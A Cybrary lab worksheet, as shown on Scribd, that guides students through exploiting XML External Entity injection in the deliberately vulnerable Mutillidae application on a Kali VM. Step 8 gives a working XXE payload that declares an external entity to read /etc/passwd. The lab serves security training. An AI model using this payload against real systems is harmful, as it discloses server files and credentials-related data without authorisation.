Module 5 XML External Entities (XXE) Lab: Brought To You by

The document describes an XML External Entities (XXE) lab that demonstrates how external entities in XML can be used to access files on a system that a user normally would not have access to. The lab steps have students log into a virtual machine, navigate to an XXE vulnerability in a web application, and execute a command that reads and displays the contents of the /etc/passwd file by defining it as an external entity in the XML.

Uploaded by

Taha Khan

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

0% found this document useful (0 votes)

202 views2 pages

Module 5 XML External Entities (XXE) Lab: Brought To You by

Uploaded by

Taha Khan

We take content rights seriously. If you suspect this is your content, claim it here.

Available Formats

Download as PDF, TXT or read online on Scribd

You are on page 1/ 2

Module 5 XML External Entities (XXE) Lab

Description: In this lab, you will identify and exploit simple examples of XXE in a web
application. Entities in XML documents allow a developer to break the document into parts,
which makes it more modular. If a user is allowed to influence the declaration of these
entities, it might allow the user to access files that they would not normally have access to.
Requirements: You will need access to the Cybrary lab environment for this lab.

Step 1: Log into Cybrary

Step 2: Launch the OWASP XML External Entities lab by searching for it in the catalog
and selecting the launch button Note: It may take 30-40 seconds for the lab to launch after
clicking the button.
Note: It may take 30-40 seconds for the lab to launch after clicking the button.
Step 3: When the lab opens, you will see a pop-up box. Select the Next button, then Ok to
close the pop-up box.
Step 4: You will then be taken to the Kali Linux log in screen.
Step 5: Enter a username of student and a password of student to log into the desktop.
Step 6: Next, launch Firefox by clicking on the orange-colored icon near the top-left of the
screen. This will launch the mutillidae page.
Step 7: Next, navigate to OWASP 2017, then A4 – XML External Entities, then XML
External Entity Injection, then XML Validator.
Step 8: Next, you will type the following command into the “XML” box and click the Validate
XML button. Double-check what you are typing, so the command runs successfully.

<?xml version=”1.0” encoding=”ISO-8859-1”?>

<!DOCTYPE example [
<!ELEMENT attack ANY >
<!ENTITY xxe SYSTEM “/etc/passwd” >
]>
<attack>&xxe;</attack>

Brought to you by: Develop your team with the fastest growing catalog in the
cybersecurity industry. Enterprise-grade workforce development
management, advanced training features and detailed skill gap and

competency analytics.
1

Question 1: Do you see the contents of the /etc/passwd file after running the command?
_____________________________________________________________________

Note: Assuming we know more file paths on the server, we could use the command to
views those files. However, since we are passing data through the XML parser, we are
unable to pass XML, HTML, or binary data without it giving us an error message.